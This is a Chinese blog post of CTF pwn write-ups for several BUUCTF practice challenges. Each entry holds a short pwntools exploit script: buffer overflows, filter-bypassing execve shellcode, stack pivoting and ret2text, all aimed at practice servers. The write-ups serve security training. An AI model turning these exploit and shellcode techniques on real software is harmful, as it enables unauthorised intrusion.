BUUCTF刷题7

最新推荐文章于 2022-02-11 10:52:30 发布
最新推荐文章于 2022-02-11 10:52:30 发布
阅读量349 收藏
点赞数
分类专栏: PWN 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_51251108/article/details/121238699
版权

题目:

护网杯_2018_gettingstart:(浮点数内存表示)

参考师傅:护网杯_2018_gettingstart(浮点数内存表示) · 语雀 (yuque.com)

主要就是double怎么转化到计算机里存储的

一个在线计算网站:

Double (IEEE754 Double precision 64-bit) Converter (binaryconvert.com)

from pwn import *
r = remote('node4.buuoj.cn',29374 )
r.sendline('a'*0x18+p64(0x7FFFFFFFFFFFFFFF)+p64(0x3FB999999999999A))
r.interactive()

starctf_2019_babyshell:(有限制的shellcode)

参考师傅: BUUCTF-pwn]——starctf_2019_babyshell_Y_peak的博客-CSDN博客_starctf_2019_babyshell

能绕过循环检查\x00

\x00B后面加上一个字符, 对应一个汇编语句

\x00J\x00也行

from pwn import *
r = remote('node4.buuoj.cn',25763 )
context.arch='amd64'
sc=asm('''
    mov rbx, 0x68732f6e69622f  
    push rbx
    push rsp 
    pop rdi
    xor esi, esi               
    xor edx, edx           
    push 0x3b
    pop rax
    syscall
''')
r.send('\x00bb'+sc)
r.interactive()

picoctf_2018_buffer overflow 0:

ssh-p 27306 CTFMan@node4.buuoj.cn

连入ssh,输入密码guest

这里的函数signal(11, sigsegv_handler);

如果是无效的内存引用就执行sigsegv_handler函数,

里面是fprintf(stderr, “%s\n”, flag)

以字符串的形式发送flag到stderr流当中

stderr:【unix】标准输出(设备)文件,对应终端的屏幕。进程将从标准输入文件中得到输入数据,将正常输出数据输出到标准输出文件,而将错误信息送到标准错误文件中。在C中,程序执行时,一直处于开启状态。

Linux常用系统函数 - tigerloveapple - 博客园 (cnblogs.com)

getegid()用来取得执行目前进程有效组识别码. 有效的组识别码用来决定进程执行时组的权限.

返回值:返回有效的组识别码.

getresgid() 分别获取真实的,有效的和保存过的组标识号

这题我们

./vuln argv[1]

./vuln aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

多输几个a,溢出了就会输出flag

参考师傅:picoctf_2018_buffer overflow 0(7/100) - 简书 (jianshu.com)

[BSidesCF 2019]Runit:(shellcode)

from pwn import *
#from LibcSearcher import * 
local_file  = './runit'
local_libc  = './libc-2.23.so'
remote_libc = './libc-2.23.so'
#remote_libc = '/home/glibc-all-in-one/libs/buu/libc-2.23.so'
select = 1
if select == 0:
    r = process(local_file)
    libc = ELF(local_libc)
else:
    r = remote('node4.buuoj.cn',28642 )
    libc = ELF(remote_libc)
elf = ELF(local_file)
context.log_level = 'debug'
context.arch = elf.arch
se      = lambda data               :r.send(data) 
sa      = lambda delim,data         :r.sendafter(delim, data)
sl      = lambda data               :r.sendline(data)
sla     = lambda delim,data         :r.sendlineafter(delim, data)
sea     = lambda delim,data         :r.sendafter(delim, data)
rc      = lambda numb=4096          :r.recv(numb)
rl      = lambda                    :r.recvline()
ru      = lambda delims                         :r.recvuntil(delims)
uu32    = lambda data               :u32(data.ljust(4, '\0'))
uu64    = lambda data               :u64(data.ljust(8, '\0'))
info    = lambda tag, addr        :r.info(tag + ': {:#x}'.format(addr))
o_g_32_old = [0x3ac3c, 0x3ac3e, 0x3ac42, 0x3ac49, 0x5faa5, 0x5faa6]
o_g_32 = [0x3ac6c, 0x3ac6e, 0x3ac72, 0x3ac79, 0x5fbd5, 0x5fbd6]
o_g_old = [0x45216,0x4526a,0xf02a4,0xf1147]
o_g = [0x45226, 0x4527a, 0xf0364, 0xf1207]
def debug(cmd=''):
     gdb.attach(r,cmd)
#----------------------------
context.arch='i386'
sc=asm(shellcraft.sh())
sl(sc)
r.interactive()

wdb_2018_3rd_soEasy:(栈迁移)

from pwn import *
#from LibcSearcher import * 
local_file  = './wdb_2018_3rd_soEasy'
local_libc  = './libc-2.23.so'
remote_libc = './libc-2.23.so'
#remote_libc = '/home/glibc-all-in-one/libs/buu/libc-2.23.so'
select = 1
if select == 0:
    r = process(local_file)
    libc = ELF(local_libc)
else:
    r = remote('node4.buuoj.cn',29461 )
    libc = ELF(remote_libc)
elf = ELF(local_file)
context.log_level = 'debug'
context.arch = elf.arch
se      = lambda data               :r.send(data)
sa      = lambda delim,data         :r.sendafter(delim, data)
sl      = lambda data               :r.sendline(data)
sla     = lambda delim,data         :r.sendlineafter(delim, data)
sea     = lambda delim,data         :r.sendafter(delim, data)
rc      = lambda numb=4096          :r.recv(numb)
rl      = lambda                    :r.recvline()
ru      = lambda delims                         :r.recvuntil(delims)
uu32    = lambda data               :u32(data.ljust(4, '\0'))
uu64    = lambda data               :u64(data.ljust(8, '\0'))
info    = lambda tag, addr        :r.info(tag + ': {:#x}'.format(addr))
o_g_32_old = [0x3ac3c, 0x3ac3e, 0x3ac42, 0x3ac49, 0x5faa5, 0x5faa6]
o_g_32 = [0x3ac6c, 0x3ac6e, 0x3ac72, 0x3ac79, 0x5fbd5, 0x5fbd6]
o_g_old = [0x45216,0x4526a,0xf02a4,0xf1147]
o_g = [0x45226, 0x4527a, 0xf0364, 0xf1207]
def debug(cmd=''):
     gdb.attach(r,cmd)
#----------------------------
leave_ret=0x08048478
context.arch='i386'
ru('Hei,give you a gift->0x')
context.arch='i386'
sc=asm(shellcraft.sh())
stack=int(rc(8),16)
print hex(stack)
sl('aaaa'+sc.ljust(0x48,'\x00')+p32(stack)+p32(leave_ret))
r.interactive()

suctf_2018_stack:(栈平衡)

Ubuntu18要检查栈平衡

ret2text涉及到的堆栈平衡问题_一路开花●-●的博客-CSDN博客

from LibcSearcher import * 
local_file  = './SUCTF_2018_stack'
local_libc  = './libc-2.27.so'
remote_libc = './libc-2.27.so'
#remote_libc = '/home/glibc-all-in-one/libs/buu/libc-2.23.so'
select = 1
if select == 0:
    r = process(local_file)
    libc = ELF(local_libc)
else:
    r = remote('node4.buuoj.cn',25323 )
    libc = ELF(remote_libc)
elf = ELF(local_file)
context.log_level = 'debug'
context.arch = elf.arch
se      = lambda data               :r.send(data) 
sa      = lambda delim,data         :r.sendafter(delim, data)
sl      = lambda data               :r.sendline(data)
sla     = lambda delim,data         :r.sendlineafter(delim, data)
sea     = lambda delim,data         :r.sendafter(delim, data)
rc      = lambda numb=4096          :r.recv(numb)
rl      = lambda                    :r.recvline()
ru      = lambda delims                         :r.recvuntil(delims)
uu32    = lambda data               :u32(data.ljust(4, '\0'))
uu64    = lambda data               :u64(data.ljust(8, '\0'))
info    = lambda tag, addr        :r.info(tag + ': {:#x}'.format(addr))
o_g_32_old = [0x3ac3c, 0x3ac3e, 0x3ac42, 0x3ac49, 0x5faa5, 0x5faa6]
o_g_32 = [0x3ac6c, 0x3ac6e, 0x3ac72, 0x3ac79, 0x5fbd5, 0x5fbd6]
o_g_old = [0x45216,0x4526a,0xf02a4,0xf1147]
o_g = [0x45226, 0x4527a, 0xf0364, 0xf1207]
def debug(cmd=''):
     gdb.attach(r,cmd)
#---------------------------------------------
backdoor=0x400676
sl('a'*0x20+'b'*8+p64(backdoor+1))
#sl('a'*0x20+'b'*8+p64(backdoor+2))
r.interactive()

实际操作的话加个ret就行,如果有限制,无脑的做法加减几个数试试

Nq0inaen
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ISCTF PWN WP 2022
GeekCmore的博客
11-07 1457
ISCTF PWN 部分题解 WP
BUUCTF pwn hwb2018_gettingstart
stareforever的博客
02-01 680
查看程序保护 IDA打开查看程序流 读入buf的内容会覆盖v7和v8的值,那么控制v7=0x7FFFFFFFFFFFFFFF和v8=0.1,即可获得shell 这里v8的二进制值可以直接在程序里找到 或者在网站http://www.binaryconvert.com/convert_double.html 输入0.1也可获得 完整ex from pwn import * context(log_level='debug') #io=process("./task_gettingStart_kt
BUUCTF(pwn)starctf_2019_babyshell
半岛铁盒的博客
04-06 365
这里要求我们需要输入一个SHellcode 然后进入 一个 if 比较; 只需要通过\x00绕过检查, 同时执行我们输入的shellcode \x00B后面加上一个字符, 对应一个汇编语句。 所以我们可以通过\x00B\x22、\x00B\x00等等来绕过那个检查 from pwn import * context.arch = "amd64" p = remote("node3.buuoj.cn",27993) payload = '\x00B3' + asm(shellcraft.sh()) p...
starctf_2019_babyshell
z1r0的博客
02-11 510
starctf_2019_babyshell 查看保护 方法一: 这一题解法还挺多的。输入shellcode,将shellcode放到400786里判断 接着判断shellcode是否是byte_400978里面的字符,这题和可见字符很像,但难度高一点点,这里一开始笔者没有想到什么思路 在网上找了一些wp看了一下(wp),发现给的字符串强制转换成代码可以看到一些有用的东西 在主函数结束时有一个sys_read,mov eax,0 call rdx。 要调用sys_read我们要控制rax=0 rd
百度杯十一月第一周 PWN loading 详解
aptx4869_li的博客
06-11 1217
PWN-loading-wp0x0001用IDA查看发现只有一个关键函数:首先,了解一下 mmap 函数是干什么的:推荐一个网址:https://www.cnblogs.com/huxiao-tee/p/4660352.html
BUUCTF逆向前八题
01-24
在本篇中,我们将探讨在BUUCTF储备赛中遇到的前八道逆向题目,通过这些题目来学习如何使用逆向工具,如exeinfo和IDA,以及如何解析汇编代码以获取关键信息。 1. Easyre: 这道题首先使用exeinfo查看文件信息,确认...
BasicASM.s(BUUCTF
06-04
分析过程文件
BUUCTF题目(含工具),你竟然赶我走、乌镇峰会种图、你竟然赶我走、大白、(超级详细)“小白”入坑CTF,先入手杂项部分
04-09
BUUCTF题目(含工具),你竟然赶我走、乌镇峰会种图、你竟然赶我走、大白、(超级详细)“小白”入坑CTF,先入手杂项部分
BUUCTF部分web题目
最新发布
05-06
### BUUCTF部分Web题目分析 #### WMCTF2020 Make PHP Great Again **题目背景**: 这道题目主要是考察PHP中的`require_once()`函数的使用以及如何利用符号链接来读取文件。 **核心知识点**: 1. **`require_once()...
BUUCTF】MISC zip
01-20
import zipfile import string import binascii def CrackCrc(crc): for i in dic: for j in dic: for p in dic: for q in dic: s = i + j + p + q if crc == (binascii.crc32(s.encode())): ...
PWN-shellcode-WP- (一)题目文件.rar
03-29
为几道搜集的真题,https://blog.csdn.net/qq_43390703/article/details/105181147中有对他们的详细解答,是学习pwn入门的很好练手和熟悉知识点以及pwn技巧的真题。
pwn的一些命令
qq_32388437的博客
07-13 1321
gdb 常用命令=======r 执行程序至断点c 继续执行程序s 单步执行n 步过执行x 查看指定地址的内存地址的值  x/(n,f,u为可选参数) n为需要显示的内存单元个数  f为显示格式:               x(hex)按十六进制格式显示变量。               d(decimal)按十进制格式显示变量。               u(unsigneddecimal)...
BUUCTF之“starctf_2019_babyshell”
Probeginner的博客
12-21 378
shellcode的强化
[BUUCTF]PWN——护网杯_2018_gettingstart
mcmuyanga的博客
03-18 653
护网杯_2018_gettingstart 例行检查,64位程序,除了RELRO,其他全开 试运行一下,看看大概的情况 64位ida载入 当满足v5=0x7FFFFFFFFFFFFFFFLL并且v6=0.1的时候就能够获取shell,看一下栈布局 确定了偏移,可以在读入buf的时候修改v5和v6的值 这题没什么难度,v5的值可以直接表示,只是要注意一下0.1在内存中的表示。内存中存放的是数据的补码,浮点型数据的在内存中按照IEEE754 标准存储。有兴趣的师傅可以百度看看怎么算。这边在其他师傅的博
2018护网杯pwn题目task_gettingStart_ktQeERc的writeup
iqiqiya的博客
10-13 1301
下载后   本来想先用checksec 看看有啥保护 但是却发现执行不了(这里不太明白) 看到做出的人那么多  也就没有顾虑了 载入IDA   看到关键字符串  且有/bin/sh     双击进入    发现连续三个跳转之后   就是最终结果 直接F5看伪代码    看到read()之后    这不就是栈溢出嘛  覆盖v7 v8的数据达到条件即可获得shell 栈中顺序...
护网杯_2018_gettingstart
z1r0的博客
02-01 1151
护网杯_2018_gettingstart 查看保护 v7=0x7fff。。。。v8=0.1时会拿到shell 而buf里面包含了v7和v8所以可以对v7和v8进行修改 v8在内在里面可以使用https://binaryconvert.com/result_double.html?decimal=04046049 from pwn import * context(arch='amd64', os='linux', log_level='debug') file_name = './z1r0' d
ciscn_2019_final_5(临界条件错误,劫持GOT)
m0_51251108的博客
11-11 638
ciscn_2019_final_5: got表可写,pie没开 程序分析: 主界面: add函数: delete函数: 由于一般地址都会16位对齐,这里的free用按位与取前15位,最后一位为0 其实也没啥问题 edit函数: 和delete,都是取最后一位为下标 漏洞分析: 漏洞出现在add函数里的index我们能取0x10,即(0001 0000) 而它如果与倒数第五位为0的heap_ptr按位与的话会导致存进heap_list的地址变大0x10 例:我们申请第一个堆的地址最后三位一般为0x
[BUUCTF]PWN——mrctf2020_shellcode_revenge(可见字符shellcode)
mcmuyanga的博客
03-15 3782
mrctf2020_shellcode_revenge 例行检查,64位程序,开启了RELRO和PIE 本地运行看一下大概的情况 64位ida载入,没法f5,直接看汇编 jg大于则跳转,jl小于则跳转,jump无条件跳转 要让程序继续执行下去,肯定是跳转loc_11AC loc_123A loc_11B8 cdqe使用eax的最高位拓展rax高32位的所有位 movzx则是按无符号数传送+扩展(16-32) EAX是32位的寄存器,而AX是EAX的低16位,AH是ax的高8位,而AL是ax的低
buuctf web
08-15
回答:根据引用和引用的内容,buuctf web应该是指buuctf比赛中的一个web题目。其中可能涉及到Tornado作为非阻塞式服务器的使用,以及render函数的使用。而根据引用的内容,buuctf web题目可能存在一些漏洞,比如SSRF(Server Side Request Forgery)漏洞,可以通过对内网web应用实施攻击获取webshell。因此,在buuctf web题目中,可能需要掌握SSRF漏洞的利用和对web应用的渲染函数(render函数)进行利用。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [【CTFbuuctf web 详解(持续更新)](https://blog.csdn.net/m0_52923241/article/details/119641325)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}}] [.reference_item style="max-width: 33.333333333333336%"] - *2* [【BUUCTF刷题】Web解题方法总结(一)](https://blog.csdn.net/qq_45834505/article/details/114276572)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}}] [.reference_item style="max-width: 33.333333333333336%"] - *3* [BUUCTF的Web真题学习整理(一)](https://blog.csdn.net/qq_41429081/article/details/98042205)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}}] [.reference_item style="max-width: 33.333333333333336%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值